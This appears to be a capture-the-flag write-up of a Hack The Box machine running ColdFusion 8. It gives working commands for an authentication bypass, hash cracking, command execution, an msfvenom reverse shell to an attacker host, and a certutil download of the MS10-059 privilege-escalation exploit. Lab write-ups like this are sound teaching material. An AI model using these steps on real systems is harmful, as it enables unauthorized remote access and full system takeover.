This one started differently right from the start. Our usual nmap -sC -sV did not produce ANY results. So, I hit it with a bigger hammer. nmap -sS -A -sV -n -Pn 10.10.10.11
I'm going to skip 135 for now and see what's on 8500. There are 2 folders located at http://10.10.10.11:8500. CFIDE and cfdocs. When I try to nav to them, everything times out. Refresh and they come back.... OK. This box is a bit buggy. No worries. I navigate through the 2 folders, but there's one in CFIDE that jumps out. Administrator page. From here, we learn that the site is running Cold Fusion by Adobe and from http://10.10.10.11:8500/cfdocs/htmldocs/help.html?content=CFScript_02.html we learn that it
is ColdFusion 8. A simple Google search for Cold Fusion 8 vulnerabilities nets us a juicy Authentication Bypass method. Nice! Let's see what we can do to exploit it.
[all one line]
We get a hashed password.
#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true
Let's crack the hash. I drop it into our friendly neighborhood <a href="https://crackstation.net/">Crack Station</a> and instantly get that it is a sha1 hash of 'happyday'. Great, now I'm singing O Happy Day in my head.
Lo and behold I can now log into the Cold Fusion Admin portal. So, let's jump back to the Google search and see what vulns I can exploit with admin access to the portal. If we look farther down on the earlier URL, we see that we can upload a web traversal page as a cfm file.
If done correctly, we can navigate to http://10.10.10.11:8500/CFIDE/cfexec.cfm and get this page.
And if we run the command set that is in that image (Command: c:\windows\system32\cmd.exe Options: /c dir C:\Users > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt), then we get a list of users.
Now we know the user is tolis. Change the options field to
/c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt
and we have acquired the user flag! I try that same option set only with Administrator, but alas, permissions failed. I think it's about time we actually get a shell on this, don't you? I'll build the payload in msfvenom and then transfer it over.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=443 -f raw > shell.jsp
Now, let's create a different scheduled task to grab the reverse shell, set up netcat and then run the shell using the same method as earlier.
Nice. We have a shell as tolis. Let's pull the systeminfo information (It's in the CTB file). We'll need that for the Windows Exploit Suggester (whose output is also in the CTB file). When we look at the output of the suggester, we see MS10-059
which is a nice little kernel exploit from 2010 found https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059. So, transferring it has been a bit of a challenge, but I finally found:
certutil -urlcache -f "http://10.10.XX.XX/MS10-059.exe" MS10-059.exe
That will get the exploit onto your victim machine. Set up netcat with nc -lvnp #### and the run the exploit as "MS10-059.exe 10.10.XX.XX ####" where the X's are your IP and the # are your port number. Boom. NT AUTHORITY\SYSTEM and a root flag located in Users\Administrator\Desktop